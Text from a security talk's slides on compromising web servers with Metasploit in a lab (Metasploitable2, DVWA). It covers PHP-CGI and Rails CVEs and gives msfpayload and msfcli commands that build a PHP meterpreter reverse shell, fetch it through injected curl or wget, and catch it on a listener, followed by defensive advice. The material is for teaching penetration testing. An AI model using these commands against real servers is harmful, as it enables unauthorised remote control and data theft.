PowerPoint - Kernel Meltdown

Report
Dennis Maldonado
@DennisMald

Application Security Specialist
 WhiteHat Security

Full-Time Student
 University of Houston – Main Campus
▪ Computer Information Systems Major

Twitter
 @DennisMald

Website / Blog
 KernelMeltdown.org

Kali Linux – Our attacker machine

Metasploit Framework – Used for exploiting,
generating the payload, and establishing a
session with our victim.

Metasploitable2 – Victim Web Server
Exploiting the backend server through a web application.

Reasons why hackers want to compromise
the server:







Run attacks against the internal network
Use the server as a bot
Install backdoors onto the server
Reveal sensitive files/passwords
Execute any local file
Execute remote files
and more…

Vulnerabilities that are dangerous against a
server
 Directory Traversal
 Local File Inclusion
 Remote File Inclusion
 Remote Code Execution
 SQL Injection
 Command Injection
http://website.com/?page=index.php
http://website.com/?page=index.php
http://website.com/?page=index.php
http://website.com/
http://website.com/user.php?id=1&Submit=Submit#

Metasploit is an open-source framework used
for Security development and testing





Information gathering and fingerprinting
Exploitation/Penetration testing
Payload generation and encoding
Fuzzing
And much more…

Command Line Interfaces
 msfconsole
 msfcli

GUI Interfaces
 Metasploit Community Edition
 Armitage

Modules
 Exploit – Exploitation/Proof-of-Concept code
▪ Ruby on Rails exploit
▪ PHP-CGI exploit
 Auxiliary – Misc. modules for multiple purposes
▪
▪
▪
▪
Scanners
DDOS tools
Fingerprinting
Clients
 Payloads – Code to be executed on the exploited system
▪ System Shells
▪ Meterpreter Shells
 Post – Modules for post-exploitation tasks
▪ Persistence
▪ Password Stealing
▪ Pivoting

Active Exploits
 Actively exploit a host.
 Ex: Ruby on Rails XML exploit

Passive Exploits
 Wait’s for incoming hosts, then exploits them
 Ex: Java 0-days

Exploits contain payloads

Inline (Non Staged)
 Payload containing the exploit and shell code
 Stable
 Large size

Staged
 Exploits victim, establishes connection with attacker,
pulls down the payload

Meterpreter
 Advanced, dynamic payload.
 Extended over the network
 Extensible through modules and plugins

Types of connections
 Bind
▪ Local server gets started on victim machine
▪ Attacker connects to victim
▪ windows/x64/shell/bind_tcp
 Reverse
▪ Local server gets started on attacker machine
▪ Victim connects to attacker
▪ windows/x64/shell/reverse_tcp
 CVE 2012-1823
 DOS attack
▪ -T 10000
 Source code disclosure
▪ -s argument
 Remote Code Execution
▪ -d argument
CVE-2013-0156
Easy to find, easy to
exploit, critical
vulnerability.
 Requires just one
POST request
containing a specially
crafted XML data.
 Send commands
through YAML objects



The upload functionality allows for any file
type to be uploaded
1. Upload server-side code and check if it executes
▪ PHP = <?php echo “Hello World!”; ?>
▪ ASP = <% Response.Write "Hello World!" %>
▪ JSP = <%= new java.util.Date().toString() %>
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the
victim
4. Upload the shell and execute it

Allows an attacker to execute system level
commands.
Attempt a safe command
1.
1.
2.
echo test
uname -a
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Inject curl or wget commands to download the shell
onto the victim machine.
5. Chmod if necessary and execute

msfpayload php/meterpreter/reverse_tcp O

msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3
LPORT=1337 O

msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3
LPORT=1337 R > shell.php

# Now edit the shell.php file to remove the comment on the first line and
add "?>" at the end of the file.

==================================

msfcli multi/handler payload=php/meterpreter/reverse_tcp
lhost=10.211.55.3 lport=1337 E

Keep software up to date!
 PHP: 5.4.3, 5.3.13
 Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15

Use whitelisting for file upload extensions
 Watch for extensions and content-types
 Don’t let upload directory be executable
 Rename files if possible

Don’t pass user input as a system command!
 Use library calls when possible
 Sanitize input

BackTrack-Linux


The Metasploit Project


https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-withmetasploit-cve-2013-0156
Damn Vulnerable Web Application (DVWA)


http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
Ruby on Rails Exploitation


http://www.offensive-security.com/metasploit-unleashed/
PHP-CGI Advisory


http://www.metasploit.com/
Metasploit Unleashed


http://www.kali.org/
http://www.dvwa.co.uk/
Metasploitable 2

http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web

similar documents